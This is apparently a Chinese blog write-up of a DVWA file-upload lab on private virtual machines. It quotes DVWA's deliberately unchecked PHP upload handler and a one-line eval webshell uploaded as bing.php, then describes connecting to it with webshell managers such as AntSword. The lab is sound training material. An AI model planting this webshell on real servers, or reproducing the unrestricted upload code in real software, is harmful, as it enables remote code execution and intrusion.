1、DVWA之文件上传（一）

实验环境为三台虚拟机，网络互通，分别是：

1、kali，IP为192.168.230.131

2、win10，IP为192.168.230.142

3、server 2019，IP为192.168.230.128。（已搭好dvwa环境）

以下为低级别代码：

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?> 

无任何格式、大小限制。

用win10客户端上传的一句话木马：

<?php @eval($_GET['hu']); ?>

上传成功提示：../../hackable/uploads/bing.php succesfully uploaded!

完整的URL：http://192.168.230.128/dvwa-master/hackable/uploads/bing.php

打开冰蝎，右键新增，填入URL及密码：

鹅MMMMMMMMMMMMMMMMMMMMMM，失败了。。。

 

 换菜刀试一试

 

也有问题。。。。这里我尝试了几种可能原因

1、修改PHP一句话木马，用英文重写，如果是从网页复制过来的，对比会发现是不一样的。

2、把server 2019换成win7 ，结果呢，当然还是不行。

3、PHP版本过高，在PHPstudy上把7.3.4换成7.0，结果还是不行。

4、修改菜刀配置文件，网上找的一种方法，结果我在自己的菜刀中没有找到这个配置文件，可能是版本的问题。

从网上看了很多相关问文章，推测还是版本不对应的问题，有一个文章直接给了个终极解决大法，就是用蚁剑。

试了一下，果真可行。

 

新建文档并上传提示失败，但是刷新后可以看到是已经上传成功了。

 

 

 

从服务器端也可以看到是上传成功的。